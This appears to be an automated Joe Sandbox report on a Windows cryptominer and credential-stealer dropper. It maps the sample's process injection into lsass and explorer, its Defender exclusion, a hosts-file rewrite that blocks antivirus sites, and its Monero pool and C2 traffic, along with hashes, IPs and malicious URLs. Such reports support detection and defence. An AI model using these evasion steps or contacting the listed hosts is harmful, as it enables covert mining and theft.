Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts
MITRE ATT&CK matrix, listed per tactic column (the figure in brackets is the badge shown next to that technique in the report; techniques without a figure had no badge):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation [11]; Native API [2]; Service Execution [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading [1]; Windows Service [11]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Windows Service [11]; Process Injection [713]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: File and Directory Permissions Modification [1]; Disable or Modify Tools [1]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; File Deletion [1]; Rootkit [4]; Masquerading [1]; Virtualization/Sandbox Evasion [131]; Access Token Manipulation [1]; Process Injection [713]; Hidden Files and Directories [1]
Credential Access: Credential API Hooking [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery [1]; File and Directory Discovery [1]; System Information Discovery [24]; Security Software Discovery [331]; Process Discovery [2]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; Remote System Discovery [1]; Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data [1]; Credential API Hooking [1]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [2]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph ID: 1549199 | Sample: file.exe | Start date: 05/11/2024 | Architecture: WINDOWS | Score: 100
Top-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Yara detected Xmrig cryptocurrency miner; 9 other signatures
Top-level DNS: monerooceans.stream; gulf.moneroocean.stream

file.exe (started)
  dropped: C:\ProgramData\Google\Chrome\updater.exe (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII)
  signatures: Uses powercfg.exe to modify the power settings; Modifies the context of a thread in another process (thread injection); Modifies the hosts file; Modifies power options to not sleep / hibernate
  started: dialer.exe; powershell.exe; cmd.exe; 13 other processes (which started 13 further processes)
updater.exe (started)
  dropped: C:\Windows\Temp\lwouyklykeoh.sys (PE32+)
  signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
  started: dialer.exe (two instances); powershell.exe; 11 other processes (which started 11 further processes)
dialer.exe (from file.exe)
  signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes)
  injected: lsass.exe; winlogon.exe; 2 other processes
powershell.exe (from file.exe)
  signatures: Loading BitLocker PowerShell Module
  started: conhost.exe
cmd.exe (from file.exe)
  started: 2 other processes
dialer.exe (from updater.exe, first instance)
  signatures: Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
  started: 4 other processes
dialer.exe (from updater.exe, second instance)
  network: 162.230.48.189 (ports 49768, 49984, 80; ATT-INTERNET4US, United States); monerooceans.stream 149.102.143.109 (ports 20128, 49762, 49806; COGENT-174US, United States)
  signatures: Query firmware table information (likely to detect VMs)
powershell.exe (from updater.exe)
  started: conhost.exe
lsass.exe (injected)
  signatures: Writes to foreign memory regions

            No Antivirus matches
Source | Detection | Scanner | Label
C:\ProgramData\Google\Chrome\updater.exe | 55% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\lwouyklykeoh.sys | 5% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://162.230.48.189/api/endpoint.php | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
monerooceans.stream | 149.102.143.109 | true | false | | high
gulf.moneroocean.stream | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://162.230.48.189/api/endpoint.php | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/wsdl/soap12/P | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000022.00000000.1388723025.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000002.2575360437.000002A290A4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000022.00000002.2575231239.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000022.00000000.1388692795.000002A290A2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
162.230.48.189 | unknown | United States | 7018 | ATT-INTERNET4US | true
149.102.143.109 | monerooceans.stream | United States | 174 | COGENT-174US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549199
Start date and time: 2024-11-05 12:23:34 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 62
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 8
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.adwa.spyw.evad.mine.winEXE@90/13@1/2
EGA Information:
• Successful, ratio: 85.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 40.126.32.68, 20.190.160.20, 40.126.32.138, 40.126.32.74, 40.126.32.72, 40.126.32.76, 20.190.160.22, 40.126.32.136
• Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, azureedge-t-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target file.exe, PID 7612 because it is empty
• Execution Graph export aborted for target updater.exe, PID 3760 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
06:24:23 | API Interceptor | 1x Sleep call for process: file.exe modified
06:24:25 | API Interceptor | 32x Sleep call for process: powershell.exe modified
06:25:02 | API Interceptor | 369457x Sleep call for process: winlogon.exe modified
06:25:03 | API Interceptor | 291106x Sleep call for process: lsass.exe modified
06:25:03 | API Interceptor | 1679x Sleep call for process: svchost.exe modified
06:25:05 | API Interceptor | 346510x Sleep call for process: dwm.exe modified
06:25:06 | API Interceptor | 2021x Sleep call for process: dialer.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    162.230.48.189file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                    • 162.230.48.189/IDEK.exe
                                    149.102.143.109file.exeGet hashmaliciousXmrigBrowse
                                      file.exeGet hashmaliciousXmrigBrowse
                                        file.exeGet hashmaliciousXmrigBrowse
                                          MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                            SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              s-part-0017.t-0009.fb-t-msedge.nethttps://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.pepeworld.pro/c2VyZ2lvLmFsdmFyZXpAdG90YWxlbmVyZ2llcy5jb20=&IdTracking=03397&user=964998racking=10419&user=081904Get hashmaliciousPhisherBrowse
                                              • 13.107.253.45
                                              file.exeGet hashmaliciousLummaC, XWormBrowse
                                              • 13.107.253.45
                                              2407821277133588494.jsGet hashmaliciousStrela DownloaderBrowse
                                              • 13.107.253.45
                                              rFactura02Presupuesto_9209Urbia_pdf_.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 13.107.253.45
                                              De_posit Confirmati0n_ Mitie.htmlGet hashmaliciousUnknownBrowse
                                              • 13.107.253.45
                                              https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                              • 13.107.253.45
                                              https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                              • 13.107.253.45
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 13.107.253.45
                                              https://t.ly/UEfhCGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                              • 13.107.253.45
                                              https://wordtohtml.net/user_files/244701_d6db22759e351980/414618_dailyfeedback.htmlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                              • 13.107.253.45
                                              monerooceans.streamfile.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              file.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                              • 149.102.143.109
                                              MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                              • 44.224.209.130
                                              SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
                                              yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                              • 44.196.193.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COGENT-174US | x86_32.elf | malicious | Mirai, Gafgyt
• 38.46.60.56
COGENT-174US | debug.dbg.elf | malicious | Mirai, Gafgyt
• 38.230.129.99
COGENT-174US | m68k.elf | malicious | Mirai, Gafgyt
• 38.60.249.4
COGENT-174US | mpsl.elf | malicious | Mirai, Gafgyt
• 198.242.133.219
COGENT-174US | arm7.elf | malicious | Mirai, Gafgyt
• 207.234.30.241
COGENT-174US | ppc.elf | malicious | Mirai, Gafgyt
• 165.254.178.168
COGENT-174US | file.exe | malicious | Xmrig
• 149.102.143.109
COGENT-174US | DHL_IMPORT_8236820594.exe | malicious | FormBook
• 154.23.184.95
COGENT-174US | ppc.elf | malicious | Mirai
• 154.42.69.237
COGENT-174US | mpsl.elf | malicious | Mirai
• 38.116.142.107
ATT-INTERNET4US | mips.elf | malicious | Mirai, Gafgyt
• 107.79.77.99
ATT-INTERNET4US | debug.dbg.elf | malicious | Mirai, Gafgyt
• 75.8.57.251
ATT-INTERNET4US | x86_64.elf | malicious | Mirai, Gafgyt
• 107.209.73.178
ATT-INTERNET4US | mpsl.elf | malicious | Mirai, Gafgyt
• 75.27.117.62
ATT-INTERNET4US | arm.elf | malicious | Mirai, Gafgyt
• 12.21.247.229
ATT-INTERNET4US | arm7.elf | malicious | Mirai, Gafgyt
• 107.115.230.8
ATT-INTERNET4US | sh4.elf | malicious | Mirai, Gafgyt
• 107.68.208.185
ATT-INTERNET4US | ppc.elf | malicious | Mirai, Gafgyt
• 12.105.138.198
ATT-INTERNET4US | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
• 162.230.48.189
ATT-INTERNET4US | https://astonishing-maize-sunstone.glitch.me/ | malicious | Unknown
• 13.32.27.44
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\lwouyklykeoh.sys | file.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ahlntQUj2t.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | file.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | ICBM.exe | malicious | Xmrig
C:\Windows\Temp\lwouyklykeoh.sys | HmA7s2gaa5.exe | malicious | Xmrig
C:\ProgramData\Google\Chrome\updater.exe | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5511680
                                                                    Entropy (8bit):6.550874483171553
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Ri+ISLkAwC4YIVupdG/3tSKqetQBNzeSBPMjSZQVG2aHlyu+NsehhNreacvHGK4B:RkkIVuI3tSytQrzpMWZ66wNreacPGKK
                                                                    MD5:73A56908097EE57DD4217877AEAE4641
                                                                    SHA1:A41CC3570F40F9688B2AC9F5E7326150A3A350A6
                                                                    SHA-256:FDE56E00761A85AD495BD2D05654F3657922F665F58EDFABCF43D2FA769F0D79
                                                                    SHA-512:930BA7D57F250B5C9E020C0265DB9376D0675BFCAFB7C5C5E292ADD319EC2942A9F2B5286F997E406E7F1EFFB8E1029649A5141CD7AD032F4B75A77E51259C67
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                                    Joe Sandbox View:
• Filename: file.exe, Detection: malicious
                                                                    Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....)g.........."......"....R.....@..........@..............................T...........`..................................................v..<.....T......`T...............T.x............................@..(....D..8............w..x............................text....!.......".................. ..`.rdata...=...@...>...&..............@..@.data...h.R.......R..d..............@....pdata.......`T.......T.............@..@.00cfg.......pT.......T.............@..@.tls..........T.......T.............@....rsrc.........T.......T.............@..@.reloc..x.....T.......T.............@..B........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):1.1940658735648508
                                                                    Encrypted:false
                                                                    SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                    MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                    SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                    SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                    SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                    Malicious:false
                                                                    Preview:@...e................................. ..............@..........
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):2748
                                                                    Entropy (8bit):4.269302338623222
                                                                    Encrypted:false
                                                                    SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                                    MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                                    SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                                    SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                                    SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                                    Malicious:true
                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\ProgramData\Google\Chrome\updater.exe
                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):14544
